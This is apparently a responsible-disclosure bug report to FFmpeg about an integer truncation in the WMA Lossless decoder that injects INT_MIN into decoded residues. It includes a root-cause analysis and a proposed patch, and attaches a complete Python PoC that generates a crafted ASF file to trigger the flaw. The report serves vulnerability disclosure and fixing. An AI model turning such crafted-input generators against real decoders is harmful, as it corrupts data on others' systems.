Hi,

I found an integer overflow in FFmpeg's WMA Lossless decoder where a
crafted stream can cause a uint32 truncation in decode_channel_residues(),
producing INT_MIN in the decoded residue array which then feeds into CDLMS
prediction.

Affected file: libavcodec/wmalosslessdec.c
FFmpeg version: N-123228-g0ddece40c5


== Root Cause ==

The unary quotient decoding loop at L542 lacks a magnitude cap on `quo`
for the case where quo < 32. The overflow guard at L547-548 only fires
when quo >= 32. A crafted stream can set quo=31 (31 consecutive 1-bits
followed by a 0-bit) and combine it with a large rem_bits value derived
from ave_mean, causing the expression at L556:

    residue = (quo << rem_bits) + rem;

to produce a truncated result. With quo=31 (unsigned int) and rem_bits=28:

    31u << 28       = 0xF0000000  (correct: 0x1F0000000, truncated to 32 bits)
    0xF0000000
    + 0x0FFFFFFF    = 0xFFFFFFFF  (correct: 0x1FFFFFFFF, truncated)

After zig-zag decoding at L562:

    (0xFFFFFFFF >> 1) ^ -(0xFFFFFFFF & 1) = 0x80000000 = INT_MIN

This value is stored in channel_residues[0][2]. The caller at L965 does
not check the return value of decode_channel_residues(), so CDLMS
processes the corrupted residue unconditionally.
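
The arithmetic above can be replayed outside the decoder. This is a minimal Python sketch, not code from FFmpeg: the helper names residue_u32 and zigzag_to_int32 are made up for illustration, and the 32-bit mask stands in for C unsigned wraparound (assuming a 32-bit unsigned int).

```python
MASK32 = 0xFFFFFFFF  # models a 32-bit C unsigned int


def residue_u32(quo: int, rem_bits: int, rem: int) -> int:
    """Model `(quo << rem_bits) + rem` with 32-bit unsigned wraparound."""
    return ((quo << rem_bits) + rem) & MASK32


def zigzag_to_int32(residue: int) -> int:
    """Model `(residue >> 1) ^ -(residue & 1)` stored into a signed 32-bit int."""
    sign_mask = MASK32 if residue & 1 else 0  # -(residue & 1) as a uint32
    u = ((residue >> 1) ^ sign_mask) & MASK32
    # Reinterpret the 32-bit pattern as two's-complement signed.
    return u - (1 << 32) if u & 0x80000000 else u


if __name__ == "__main__":
    wrapped = residue_u32(31, 28, 0x0FFFFFFF)
    print(hex(wrapped), zigzag_to_int32(wrapped))
```

Run as a script, this prints 0xffffffff -2147483648, matching the values derived above.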


== Trigger Conditions ==

1. WMA Lossless codec (format tag 0x0163)
2. Seekable tile with ave_mean = 0xFFFFFF (24-bit stream)
3. movave_scaling = 1 (causes ave_sum to grow quickly)
4. Two coded samples, one pump iteration followed by the overflow at rem_bits=28:
   - Sample 1: quo=31, rem_bits=24 → residue=0x1FFFFFFF (pumps ave_sum)
   - Sample 2: quo=31, rem_bits=28 → overflow, residue=0xFFFFFFFF
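
To see how the two coded samples interact, the moving-average update can be modelled in a few lines. This is a sketch under stated assumptions: the recurrence is reconstructed from the arithmetic written out in the PoC's comments (ave_mean rounding, rem_bits as a ceiling log2, and the ave_sum update), not copied from wmalosslessdec.c, and ceil_log2 and decode_step are hypothetical helper names. It only models the case ave_mean > 1, which holds for both samples here.

```python
MASK32 = 0xFFFFFFFF  # models a 32-bit C unsigned int


def ceil_log2(x: int) -> int:
    """Smallest n with 2**n >= x, for x >= 1."""
    return (x - 1).bit_length()


def decode_step(ave_sum: int, quo: int, rem: int, scaling: int):
    """One modelled residue step; returns (rem_bits, residue, new_ave_sum).

    Assumes ave_mean > 1 (the only case exercised by this PoC).
    """
    ave_mean = ((ave_sum + (1 << scaling)) & MASK32) >> (scaling + 1)
    rem_bits = ceil_log2(ave_mean)
    rem &= (1 << rem_bits) - 1  # keep only rem_bits bits of the remainder
    residue = ((quo << rem_bits) + rem) & MASK32
    new_sum = (residue + ave_sum - (ave_sum >> scaling)) & MASK32
    return rem_bits, residue, new_sum


if __name__ == "__main__":
    scaling = 1
    ave_sum = 0xFFFFFF << (scaling + 1)  # seeded from the 24-bit ave_mean
    for sample in (1, 2):
        # quo=31 with an all-ones remainder, as in the trigger conditions
        rem_bits, residue, ave_sum = decode_step(ave_sum, 31, MASK32, scaling)
        print(sample, rem_bits, hex(residue))
```

Under this model the first sample reads 24 remainder bits and the second reads 28, which is where the wrapped value 0xffffffff appears.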


== Observed Output ==

No ASan/UBSan report: the overflow uses unsigned arithmetic (defined
behavior in C). The bug produces a value-level corruption.

    [wmalossless] frame[0] would have to skip 288 bits
    Error submitting packet to decoder: Invalid data found when processing input
    [wmalossless] frame[0] would have to skip -728 bits
    Decoding error: Invalid data found when processing input
    audio:0KiB

The 'skip 288 bits' message indicates that decode_channel_residues() consumed
an unexpected number of bits, which is consistent with the wrapped residue
feeding back into ave_sum and changing how many remainder bits later samples
read. That mismatch triggered the frame-level misalignment check. INT_MIN was
stored in channel_residues[0][2] and passed to CDLMS before the frame
was rejected. Zero audio was output in this PoC.

A more carefully crafted stream that produces the overflow without
triggering bit-count misalignment could deliver INT_MIN silently into
decoded audio output without any error.


== Suggested Fix ==

Reject the shift before it overflows. Note: av_log2(0) returns 0 in FFmpeg,
not -1, so the quo > 0 test below is a defensive guard rather than a strict
requirement:

    --- a/libavcodec/wmalosslessdec.c
    +++ b/libavcodec/wmalosslessdec.c
    @@ -553,7 +553,10 @@ static int decode_channel_residues(...)
         } else {
             rem_bits = av_ceil_log2(ave_mean);
             rem      = get_bits_long(&s->gb, rem_bits);
    -        residue  = (quo << rem_bits) + rem;
    +        if (quo > 0 && rem_bits + av_log2(quo) >= 32) {
    +            return AVERROR_INVALIDDATA;
    +        }
    +        residue  = (quo << rem_bits) + rem;
         }

Additionally, the return value at L965 should be checked:

    -    decode_channel_residues(s, i, subframe_len);
    +    if (decode_channel_residues(s, i, subframe_len) < 0)
    +        return AVERROR_INVALIDDATA;
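
As a sanity check on the proposed condition, the guard can be compared against exact integer arithmetic. The sketch below is Python rather than the patch's C. floor_log2 stands in for av_log2() on nonzero inputs, and guard_fires and overflows_u32 are hypothetical names used only here.

```python
def floor_log2(v: int) -> int:
    """Index of the highest set bit; stand-in for av_log2() when v > 0."""
    return v.bit_length() - 1


def guard_fires(quo: int, rem_bits: int) -> bool:
    """The condition from the proposed patch."""
    return quo > 0 and rem_bits + floor_log2(quo) >= 32


def overflows_u32(quo: int, rem_bits: int) -> bool:
    """True if (quo << rem_bits) + rem can exceed 32 bits for some rem."""
    max_rem = (1 << rem_bits) - 1
    return (quo << rem_bits) + max_rem > 0xFFFFFFFF


if __name__ == "__main__":
    # Exhaustive over the quo < 32 path and every shift count below 32.
    mismatches = [(q, r) for q in range(32) for r in range(32)
                  if guard_fires(q, r) != overflows_u32(q, r)]
    print("mismatches:", mismatches)
    print("quo=31, rem_bits=28 rejected:", guard_fires(31, 28))
```

Over that range the guard fires exactly when the exact result no longer fits in 32 bits, so it rejects quo=31 with rem_bits=28 while still accepting quo=31 with rem_bits=27.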


== Reproduction ==

PoC script attached (poc_wma.py). Generates /tmp/poc_wma.wma:

    python3 poc_wma.py
    ffmpeg -i /tmp/poc_wma.wma -f null - 2>&1

Expected:
    [wmalossless] frame[0] would have to skip 288 bits
    Invalid data found when processing input
    audio:0KiB

Tested on Ubuntu 22.04, gcc 11, N-123228-g0ddece40c5.
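
When scripting the reproduction, the decoder's stderr can be checked for the two marker lines. This is a minimal sketch, assuming ffmpeg is on PATH and the PoC file already exists at /tmp/poc_wma.wma. run_poc and hit_expected_path are hypothetical helper names, and the regular expression only encodes the message text quoted in this report.

```python
import re
import subprocess

# Matches e.g. "frame[0] would have to skip 288 bits" (count may be negative).
SKIP_RE = re.compile(r"frame\[\d+\] would have to skip -?\d+ bits")
INVALID_MSG = "Invalid data found when processing input"


def hit_expected_path(stderr_text: str) -> bool:
    """True if the log contains both messages quoted in the report."""
    return bool(SKIP_RE.search(stderr_text)) and INVALID_MSG in stderr_text


def run_poc(path: str = "/tmp/poc_wma.wma") -> bool:
    """Run the reproduction command and scan its stderr."""
    proc = subprocess.run(
        ["ffmpeg", "-i", path, "-f", "null", "-"],
        capture_output=True,
        text=True,
    )
    return hit_expected_path(proc.stderr)
```

Calling run_poc() after python3 poc_wma.py returns True only when both messages appear. It does not by itself prove that INT_MIN reached CDLMS.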

Thanks,
Guanni Qu

[Attachment: poc_wma.py]

#!/usr/bin/env python3
"""
PoC for integer overflow in FFmpeg WMA Lossless decoder
(wmalosslessdec.c: decode_channel_residues())

The unary quotient loop at L542 lacks a magnitude cap on `quo`.
With 31 consecutive 1-bits, quo=31 (<32, so no overflow-guard path).
Then residue = (quo << rem_bits) + rem overflows uint32 when rem_bits >= 28.

By setting initial ave_mean high (via seekable tile) and movave_scaling=1,
one pump iteration (sample 1) raises ave_sum so that rem_bits reaches 28 on
sample 2, causing: (31 << 28) + 0x0FFFFFFF = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF
(mathematical result is 0x1FFFFFFFF, a 33-bit value that wraps).

The corrupted residue (INT_MIN after zig-zag) feeds into CDLMS prediction
before the frame-level bit-count check detects misalignment and rejects
the frame. The return value of decode_channel_residues() is not checked
at L965, so CDLMS processes the corrupt value unconditionally.

Observed output is consistent with the overflow path having been reached:
  "frame[0] would have to skip 288 bits": the number of bits consumed during
  decode_channel_residues() did not match the declared frame length.
  Zero audio output (audio:0KiB): frame rejected on bit-count guard.

A more carefully crafted file avoiding bit-count misalignment could
deliver INT_MIN silently into decoded audio output without any error.

Key fix vs v1: block_align=64 makes log2_frame_size=10, so the WMA packet
header is exactly 16 bits = 2 bytes. The first ASF packet delivers a 2-byte
AVPacket that the decoder consumes in one call (no sub-call). The second
AVPacket then enters the else branch cleanly and decodes the frame.
"""

import struct

# ─── ASF GUIDs (from FFmpeg libavformat/asf_tags.c) ─────────────────────────

ASF_HEADER_GUID = bytes([
    0x30, 0x26, 0xB2, 0x75, 0x8E, 0x66, 0xCF, 0x11,
    0xA6, 0xD9, 0x00, 0xAA, 0x00, 0x62, 0xCE, 0x6C
])

ASF_FILE_PROPERTIES_GUID = bytes([
    0xA1, 0xDC, 0xAB, 0x8C, 0x47, 0xA9, 0xCF, 0x11,
    0x8E, 0xE4, 0x00, 0xC0, 0x0C, 0x20, 0x53, 0x65
])

ASF_STREAM_PROPERTIES_GUID = bytes([
    0x91, 0x07, 0xDC, 0xB7, 0xB7, 0xA9, 0xCF, 0x11,
    0x8E, 0xE6, 0x00, 0xC0, 0x0C, 0x20, 0x53, 0x65
])

ASF_AUDIO_MEDIA_GUID = bytes([
    0x40, 0x9E, 0x69, 0xF8, 0x4D, 0x5B, 0xCF, 0x11,
    0xA8, 0xFD, 0x00, 0x80, 0x5F, 0x5C, 0x44, 0x2B
])

ASF_NO_ERROR_CORRECTION_GUID = bytes([
    0x00, 0x57, 0xFB, 0x20, 0x55, 0x5B, 0xCF, 0x11,
    0xA8, 0xFD, 0x00, 0x80, 0x5F, 0x5C, 0x44, 0x2B
])

ASF_HEADER_EXTENSION_GUID = bytes([
    0xb5, 0x03, 0xbf, 0x5f, 0x2E, 0xA9, 0xCF, 0x11,
    0x8e, 0xe3, 0x00, 0xc0, 0x0c, 0x20, 0x53, 0x65
])

ASF_RESERVED1_GUID = bytes([
    0x11, 0xd2, 0xd3, 0xab, 0xBA, 0xA9, 0xCF, 0x11,
    0x8e, 0xe6, 0x00, 0xc0, 0x0c, 0x20, 0x53, 0x65
])

ASF_DATA_GUID = bytes([
    0x36, 0x26, 0xb2, 0x75, 0x8E, 0x66, 0xCF, 0x11,
    0xa6, 0xd9, 0x00, 0xaa, 0x00, 0x62, 0xce, 0x6c
])

FILE_ID_GUID = bytes([
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
    0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10
])


# ─── Codec parameters ───────────────────────────────────────────────────────

SAMPLE_RATE      = 8000
BITS_PER_SAMPLE  = 24
NUM_CHANNELS     = 1
CHANNEL_MASK     = 0x04        # Front center (mono)
BLOCK_ALIGN      = 64          # Small block_align → log2_frame_size = 10
DECODE_FLAGS     = 0x0046      # len_prefix=1 (bit6), frame_len_bits -= 2 (bits1-2=0x6)
# frame_len_bits = 9 (for 8kHz) - 2 = 7, samples_per_frame = 128
# log2_frame_size = av_log2(64) + 4 = 6 + 4 = 10
# WMA packet header = 4(seq) + 1(skip) + 1(spliced) + 10(num_bits_prev_frame) = 16 bits = 2 bytes
# This ensures the first AVPacket (2 bytes) is consumed in one decode_packet call.

ASF_PACKET_SIZE  = 256         # Fixed ASF packet size (both packets same size)

# First ASF data packet: delivers 2-byte AVPacket (WMA header only)
#   packet_flags = 0x10 → 2-byte padsize field, rsize_packet = 13
#   packet_size_left = 256 - padsize - 13
#   rsize_frame = 10 (stream_num(1) + replic_size_byte(1) + replic_data(8))
#   frag_size = packet_size_left - 10 = 233 - padsize
#   For frag_size = 2: padsize = 231
PKT1_PADSIZE     = 231
PKT1_OBJ_SIZE    = 2

# Second ASF data packet: delivers frame data
#   packet_flags = 0x00 → no optional fields, rsize_packet = 11
#   packet_size_left = 256 - 0 - 11 = 245
#   rsize_frame = 10
#   frag_size = 245 - 10 = 235
PKT2_OBJ_SIZE    = 235


# ─── Bit-level writer ───────────────────────────────────────────────────────

class BitWriter:
    def __init__(self):
        self.bits = []

    def write_bits(self, value, num_bits):
        """Write num_bits from value (MSB first)."""
        for i in range(num_bits - 1, -1, -1):
            self.bits.append((value >> i) & 1)

    def write_ones(self, count):
        """Write count 1-bits."""
        self.bits.extend([1] * count)

    def to_bytes(self, min_length=0):
        """Convert to bytes, padding with zeros to byte boundary and min_length."""
        b = list(self.bits)
        while len(b) % 8 != 0:
            b.append(0)
        result = bytearray()
        for i in range(0, len(b), 8):
            byte = 0
            for j in range(8):
                byte = (byte << 1) | b[i + j]
            result.append(byte)
        while len(result) < min_length:
            result.append(0)
        return bytes(result)

    def __len__(self):
        return len(self.bits)


def build_wma_frame_bitstream():
    """
    Build the WMA Lossless frame bitstream that triggers the overflow.

    Frame layout (with len_prefix=1, log2_frame_size=10):
    - frame_len: 10 bits = 1000 (save_bits saves this many bits)
    - decode_tilehdr: tile_aligned(1) = 1
    - skip_info: flag(1) = 0
    - decode_subframe (seekable tile):
      - seekable_tile: 1
      - do_arith_coding: 0
      - do_ac_filter: 0
      - do_inter_ch_decorr: 0
      - do_mclms: 0
      - decode_cdlms: send_coef(1)=0, ttl(3)=0, order(7)=0, scaling(4)=1
      - movave_scaling: 3 bits = 1
      - quant_stepsize: 8 bits = 0 (step=1)
      - rawpcm_tile: 0
      - is_channel_coded[0]: 1
      - padding_zeroes flag: 0
    - decode_channel_residues:
      - transient: 0
      - ave_mean: 24 bits = 0xFFFFFF
      - channel_residues[0][0]: 24 bits = 0
      - Sample 1: 31 ones + 0 + 24 bits rem (pump)
      - Sample 2: 31 ones + 0 + 28 bits rem (OVERFLOW)
      - Remaining samples: read zeros from padding
    - trailer: 0
    """
    bw = BitWriter()

    # frame_len (10 bits) - value seen by show_bits and save_bits
    # Also read by decode_frame as len = get_bits(gb, 10)
    frame_len_value = 1000
    bw.write_bits(frame_len_value, 10)

    # decode_tilehdr: tile_aligned = 1
    # With max_num_subframes=1: fixed_channel_layout=1, no bits read for subframe len
    bw.write_bits(1, 1)

    # No DRC (decode_flags bit 7 = 0)

    # Skip info flag = 0 (decode_frame L1059)
    bw.write_bits(0, 1)

    # ── decode_subframe ──

    bw.write_bits(1, 1)   # seekable_tile = 1
    bw.write_bits(0, 1)   # do_arith_coding = 0
    bw.write_bits(0, 1)   # do_ac_filter = 0
    bw.write_bits(0, 1)   # do_inter_ch_decorr = 0
    bw.write_bits(0, 1)   # do_mclms = 0

    # decode_cdlms (1 channel, no coef send)
    bw.write_bits(0, 1)   # cdlms_send_coef = 0
    bw.write_bits(0, 3)   # cdlms_ttl[0] = 0 → ttl = 1
    bw.write_bits(0, 7)   # cdlms[0][0].order = 0 → order = (0+1)*8 = 8
    bw.write_bits(1, 4)   # cdlms[0][0].scaling = 1

    bw.write_bits(1, 3)   # movave_scaling = 1
    bw.write_bits(0, 8)   # quant_stepsize = 0 → step = 1

    # rawpcm_tile = 0 (check: !rawpcm && !order → !0 && !8 → false: OK)
    bw.write_bits(0, 1)

    # is_channel_coded[0] = 1
    bw.write_bits(1, 1)

    # bV3RTM = 0 (decode_flags bit 8 = 0), so no LPC read

    # padding_zeroes: flag = 0 → padding_zeroes = 0
    bw.write_bits(0, 1)

    # ── decode_channel_residues(s, 0, 128) ──

    # transient = 0
    bw.write_bits(0, 1)

    # seekable_tile = 1:
    # ave_mean = get_bits(24) = 0xFFFFFF
    bw.write_bits(0xFFFFFF, 24)
    # ave_sum[0] = 0xFFFFFF << (1+1) = 0x3FFFFFC

    # channel_residues[0][0] = get_sbits_long(24) = 0
    bw.write_bits(0, 24)

    # ── Sample i=1 (pump step) ──
    # Unary: 31 ones then 0 → quo = 31 (< 32, no extra bits)
    bw.write_ones(31)
    bw.write_bits(0, 1)
    # ave_mean = (0x3FFFFFC + 2) >> 2 = 0xFFFFFF
    # rem_bits = av_ceil_log2(0xFFFFFF) = 24
    # rem = 0xFFFFFF (all 24 bits set)
    bw.write_bits(0xFFFFFF, 24)
    # residue = (31 << 24) + 0xFFFFFF = 0x1FFFFFFF (fits uint32)
    # ave_sum = 0x1FFFFFFF + 0x3FFFFFC - 0x1FFFFFE = 0x21FFFFFD

    # ── Sample i=2 (OVERFLOW) ──
    # Unary: 31 ones then 0 → quo = 31
    bw.write_ones(31)
    bw.write_bits(0, 1)
    # ave_mean = (0x21FFFFFD + 2) >> 2 = 0x087FFFFF
    # rem_bits = av_ceil_log2(0x087FFFFF) = 28
    # rem = 0x0FFFFFFF (all 28 bits set)
    bw.write_bits(0x0FFFFFFF, 28)
    # residue = (31u << 28) + 0x0FFFFFFF
    #         = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF
    # *** Mathematical result should be 0x1FFFFFFFF (33 bits) ***
    # zig-zag: (0xFFFFFFFF >> 1) ^ -(0xFFFFFFFF & 1)
    #        = 0x7FFFFFFF ^ 0xFFFFFFFF = 0x80000000 = INT_MIN
    # channel_residues[0][2] = INT_MIN = -2147483648
    # -> feeds into CDLMS before frame-level bit-count check rejects frame

    # Remaining samples (i=3..127): read from zero-padded buffer
    # decode_channel_residues return value is IGNORED by caller (L965)

    # Pad remaining bits to frame_len_value
    # The saved frame data is frame_len_value bits; anything beyond our
    # explicit bits will be zero, producing quo=0, residue=0 for remaining samples
    # No need to explicitly write them

    return bw


def build_wma_header_payload():
    """
    Build the WMA Lossless packet header (first AVPacket payload).
    With log2_frame_size=10: seq(4) + skip(1) + spliced(1) + num_bits_prev_frame(10) = 16 bits = 2 bytes.

    decode_packet main branch flow:
    - packet_loss=1 from init → enters main branch
    - Reads 16 bits of WMA header
    - seq check skipped (packet_loss=1)
    - num_bits_prev_frame=0 → no prev frame data
    - Clears packet_loss, resets saved bits
    - Returns 16>>3 = 2 = buf_size → no sub-call!
    - packet_offset = 16 & 7 = 0
    """
    bw = BitWriter()
    bw.write_bits(0, 4)   # packet_sequence_number = 0
    bw.write_bits(0, 1)   # seekable_frame_in_packet (skipped)
    bw.write_bits(0, 1)   # spliced_packet = 0
    bw.write_bits(0, 10)  # num_bits_prev_frame = 0 (log2_frame_size = 10)
    assert len(bw) == 16, f"WMA header should be 16 bits, got {len(bw)}"
    return bw.to_bytes(PKT1_OBJ_SIZE)


def build_frame_payload():
    """
    Build the second AVPacket payload containing the frame data.

    decode_packet else branch flow (packet_done=0, packet_loss=0):
    - buf_bit_size = avpkt->size * 8 = PKT2_OBJ_SIZE * 8 = 1880
    - skip_bits(gb, packet_offset=0)
    - frame_size = show_bits(gb, 10) = 1000
    - 1000 <= 1880 → save_bits(s, gb, 1000, 0)
    - decode_frame reads 1000 bits of frame data
    """
    frame_bw = build_wma_frame_bitstream()
    # No packet_offset padding needed (packet_offset = 0)
    return frame_bw.to_bytes(PKT2_OBJ_SIZE)


# ─── ASF container construction ─────────────────────────────────────────────

def build_file_properties_object():
    """Build ASF File Properties Object."""
    data = FILE_ID_GUID                        # File ID: 16 bytes
    data += struct.pack('<Q', 0)               # File Size (placeholder)
    data += struct.pack('<Q', 0)               # Creation Date
    data += struct.pack('<Q', 2)               # Data Packets Count = 2
    data += struct.pack('<Q', 10000000)        # Play Duration (1 second in 100ns)
    data += struct.pack('<Q', 0)               # Send Duration
    data += struct.pack('<Q', 0)               # Preroll (64-bit, ms)
    data += struct.pack('<I', 0x02)            # Flags (seekable, not broadcast)
    data += struct.pack('<I', ASF_PACKET_SIZE) # Minimum Data Packet Size
    data += struct.pack('<I', ASF_PACKET_SIZE) # Maximum Data Packet Size
    data += struct.pack('<I', 48000)           # Maximum Bitrate

    obj = ASF_FILE_PROPERTIES_GUID
    obj += struct.pack('<Q', 24 + len(data))   # Object Size
    obj += data
    return obj


def build_waveformatex():
    """Build WAVEFORMATEX structure for WMA Lossless."""
    extradata = struct.pack('<H', BITS_PER_SAMPLE)  # bits_per_sample
    extradata += struct.pack('<I', CHANNEL_MASK)     # channel_mask
    extradata += b'\x00' * 8                         # reserved
    extradata += struct.pack('<H', DECODE_FLAGS)     # decode_flags
    extradata += b'\x00' * 2                         # padding
    assert len(extradata) == 18

    wfx = struct.pack('<H', 0x0163)            # wFormatTag (WMA Lossless)
    wfx += struct.pack('<H', NUM_CHANNELS)     # nChannels
    wfx += struct.pack('<I', SAMPLE_RATE)      # nSamplesPerSec
    wfx += struct.pack('<I', SAMPLE_RATE * NUM_CHANNELS * BITS_PER_SAMPLE // 8)
    wfx += struct.pack('<H', BLOCK_ALIGN)      # nBlockAlign
    wfx += struct.pack('<H', BITS_PER_SAMPLE)  # wBitsPerSample
    wfx += struct.pack('<H', len(extradata))   # cbSize
    wfx += extradata
    return wfx


def build_stream_properties_object():
    """Build ASF Stream Properties Object for audio."""
    wfx = build_waveformatex()

    ds_data = struct.pack('<B', 0)              # ds_span = 0
    ds_data += struct.pack('<H', 0)             # ds_packet_size
    ds_data += struct.pack('<H', 0)             # ds_chunk_size
    ds_data += struct.pack('<H', 0)             # ds_data_size
    ds_data += struct.pack('<B', 0)             # ds_silence_data

    type_specific_data = wfx + ds_data

    data = ASF_AUDIO_MEDIA_GUID                # Stream Type
    data += ASF_NO_ERROR_CORRECTION_GUID       # Error Correction Type
    data += struct.pack('<Q', 0)               # Time Offset
    data += struct.pack('<I', len(type_specific_data))
    data += struct.pack('<I', 0)               # Error Correction Data Length
    data += struct.pack('<H', 0x0001)          # Flags: stream number = 1
    data += struct.pack('<I', 0)               # Reserved
    data += type_specific_data

    obj = ASF_STREAM_PROPERTIES_GUID
    obj += struct.pack('<Q', 24 + len(data))
    obj += data
    return obj


def build_header_extension_object():
    """Build ASF Header Extension Object (minimal)."""
    data = ASF_RESERVED1_GUID
    data += struct.pack('<H', 6)               # Reserved Field 2
    data += struct.pack('<I', 0)               # Header Extension Data Size = 0

    obj = ASF_HEADER_EXTENSION_GUID
    obj += struct.pack('<Q', 24 + len(data))
    obj += data
    return obj


def build_asf_data_packet_small(payload_data):
    """
    Build the first ASF data packet with a small payload (2 bytes).

    Uses packet_flags=0x10 to include a 2-byte padsize field.
    ASF demuxer parsing:
      rsize_packet = 11 (base) + 2 (padsize field) = 13
      packet_size_left = 256 - 231 - 13 = 12
      rsize_frame = 1(stream) + 1(replic_size) + 8(replic_data) = 10
      frag_size = 12 - 10 = 2
      packet_obj_size = 2 → AVPacket of exactly 2 bytes
    """
    pkt = bytearray()

    # ECC sync
    pkt += bytes([0x82, 0x00, 0x00])

    # Packet flags: 0x10
    # bits 5-6=00: packet_length = default (256)
    # bits 3-4=10: padsize = 2-byte field
    # bits 1-2=00: sequence = default (0)
    # bit 0=0: single payload
    pkt += bytes([0x10])

    # Packet property: 0x01 (replic_size as 1-byte field)
    pkt += bytes([0x01])

    # DO_2BITS fields based on packet_flags:
    # bits 5-6=00: no packet_length field (uses default)
    # bits 1-2=00: no sequence field (uses default 0)
    # bits 3-4=10: 2-byte padsize field
    pkt += struct.pack('<H', PKT1_PADSIZE)  # padsize = 231

    # Timestamp (4 bytes) + Duration (2 bytes)
    pkt += struct.pack('<I', 0)
    pkt += struct.pack('<H', 0)

    # --- Frame/payload header (single payload, no segsizetype byte) ---
    pkt += bytes([0x81])           # stream 1, keyframe
    # DO_2BITS(packet_property >> 4=0, seq, 0): no field
    # DO_2BITS(packet_property >> 2=0, frag_offset, 0): no field
    # DO_2BITS(packet_property & 3=1, replic_size, 0): 1-byte field
    pkt += bytes([0x08])           # replic_size = 8

    # Replicated data (8 bytes)
    pkt += struct.pack('<I', PKT1_OBJ_SIZE)  # packet_obj_size = 2
    pkt += struct.pack('<I', 0)               # fragment timestamp

    # frag_size = 2 bytes of payload (from ASF math above)
    # Single-payload: frag_size = packet_size_left - rsize_frame = 12 - 10 = 2
    pkt += payload_data[:2]

    # Remaining: ASF padding (231 bytes) is consumed by avio_skip
    # Pad to ASF_PACKET_SIZE
    while len(pkt) < ASF_PACKET_SIZE:
        pkt.append(0)

    assert len(pkt) == ASF_PACKET_SIZE
    return bytes(pkt)


def build_asf_data_packet_full(payload_data):
    """
    Build the second ASF data packet with full payload (235 bytes).

    Uses packet_flags=0x00 (all defaults, no optional fields).
    ASF demuxer parsing:
      rsize_packet = 11 (base, no optional fields)
      packet_size_left = 256 - 0 - 11 = 245
      rsize_frame = 10
      frag_size = 245 - 10 = 235
      packet_obj_size = 235 → AVPacket of 235 bytes
    """
    pkt = bytearray()

    # ECC sync
    pkt += bytes([0x82, 0x00, 0x00])

    # Packet flags: 0x00 (all defaults)
    pkt += bytes([0x00])

    # Packet property: 0x01
    pkt += bytes([0x01])

    # No optional fields (all DO_2BITS default to 0)

    # Timestamp + Duration
    pkt += struct.pack('<I', 0)
    pkt += struct.pack('<H', 0)

    # Frame/payload header
    pkt += bytes([0x81])           # stream 1, keyframe
    pkt += bytes([0x08])           # replic_size = 8
    pkt += struct.pack('<I', PKT2_OBJ_SIZE)  # packet_obj_size = 235
    pkt += struct.pack('<I', 0)               # fragment timestamp

    # frag_size = 235 bytes of payload
    pkt += payload_data[:PKT2_OBJ_SIZE]

    # Pad to ASF_PACKET_SIZE
    while len(pkt) < ASF_PACKET_SIZE:
        pkt.append(0)

    assert len(pkt) == ASF_PACKET_SIZE
    return bytes(pkt)


def build_asf_file():
    """Build the complete ASF file."""

    # Header objects
    file_props = build_file_properties_object()
    stream_props = build_stream_properties_object()
    header_ext = build_header_extension_object()

    header_objects = file_props + stream_props + header_ext
    num_header_objects = 3

    # ASF Header Object
    header_data = struct.pack('<I', num_header_objects)
    header_data += bytes([0x01, 0x02])  # Reserved1, Reserved2
    header_data += header_objects

    asf_header = ASF_HEADER_GUID
    asf_header += struct.pack('<Q', 24 + len(header_data))
    asf_header += header_data

    # Data packets
    payload_1 = build_wma_header_payload()
    payload_2 = build_frame_payload()

    data_pkt_1 = build_asf_data_packet_small(payload_1)
    data_pkt_2 = build_asf_data_packet_full(payload_2)

    # ASF Data Object
    data_body = FILE_ID_GUID
    data_body += struct.pack('<Q', 2)       # Total Data Packets
    data_body += struct.pack('<H', 0x0101)  # Reserved

    data_object = ASF_DATA_GUID
    data_object += struct.pack('<Q', 24 + len(data_body) + len(data_pkt_1) + len(data_pkt_2))
    data_object += data_body
    data_object += data_pkt_1
    data_object += data_pkt_2

    asf_file = asf_header + data_object

    # Patch file size in File Properties Object
    # header GUID(16) + size(8) + num_objects(4) + reserved(2) = 30
    # Then: File Properties GUID(16) + size(8) + File ID(16) = 40
    file_size_offset = 30 + 16 + 8 + 16
    asf_file = bytearray(asf_file)
    struct.pack_into('<Q', asf_file, file_size_offset, len(asf_file))

    return bytes(asf_file)


def main():
    output_path = '/tmp/poc_wma.wma'
    asf_data = build_asf_file()

    with open(output_path, 'wb') as f:
        f.write(asf_data)

    print(f"[+] Generated PoC file: {output_path} ({len(asf_data)} bytes)")
    print(f"[+] ASF packet size: {ASF_PACKET_SIZE}")
    print(f"[+] Block align: {BLOCK_ALIGN}")
    print(f"[+] log2_frame_size: 10 (WMA header = 16 bits = 2 bytes)")
    print(f"[+] Samples per frame: 128 (frame_len_bits=7)")
    print(f"[+] movave_scaling: 1")
    print()
    print("[*] Overflow path:")
    print("    Sample 0: initial residue = 0 (seekable tile sbits)")
    print("    Sample 1: quo=31, rem_bits=24, residue=0x1FFFFFFF (pump ave_sum)")
    print("    Sample 2: quo=31, rem_bits=28, residue=(31<<28)+0x0FFFFFFF")
    print("              = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF (OVERFLOW)")
    print("              zig-zag -> 0x80000000 = INT_MIN")
    print("    -> channel_residues[0][2] = INT_MIN -> feeds into CDLMS")
    print("    -> frame rejected on bit-count mismatch; zero audio output")
    print()
    print(f"[*] Run: ffmpeg -i {output_path} -f null - 2>&1")
    print("[*] Expected: 'frame[0] would have to skip 288 bits'")
    print("[*]           'Invalid data found when processing input'")
    print("[*]           audio:0KiB (frame rejected, no samples delivered)")

    return output_path


if __name__ == '__main__':
    main()